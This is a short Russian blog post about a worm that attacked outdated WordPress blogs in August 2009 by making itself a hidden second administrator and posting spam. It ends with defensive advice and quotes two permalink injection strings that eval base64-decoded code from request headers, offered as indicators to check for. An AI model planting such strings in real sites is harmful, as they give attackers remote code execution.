Эпидемия WordPress
10 августа стало известно о критической уязвимости в WordPressверсии 2.8.3, которая с легкостью позволяла изменить пароль учетной записи администратора в удалённом режиме. В этот же день вышел релиз WordPress 2.8.4, устраняющий эту уязвимость. Но как оказалось, далеко не все «держатели» блогов следят за апдейтами.
Более того — в эти выходные разразилась эпидемия небывалых размеров нового вируса, поражающего блоги на движке старых версий. Червь регистрируется в блоге как пользователь и далее запускает вредоносный код, используя структуру permalink, в результате чего делает себя вторым администратором. Далее запускается скрипт для стирания данных о черве со страницы пользователей, а после с этой учетной записи начинается добавление спама и ссылок на вредоносный контент в архивные топики.
Как избежать взлома вашего блога WordPress?
- Проверьте фид permalinks/rss на присутствие нижеследующего кода:
- Прочитайте руководство кодекса по данному вопросу.
- Ознакомьтесь со статьей Мэтта по поводу проблему.
- Попробуйте найти скрытую запись второго администратора.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
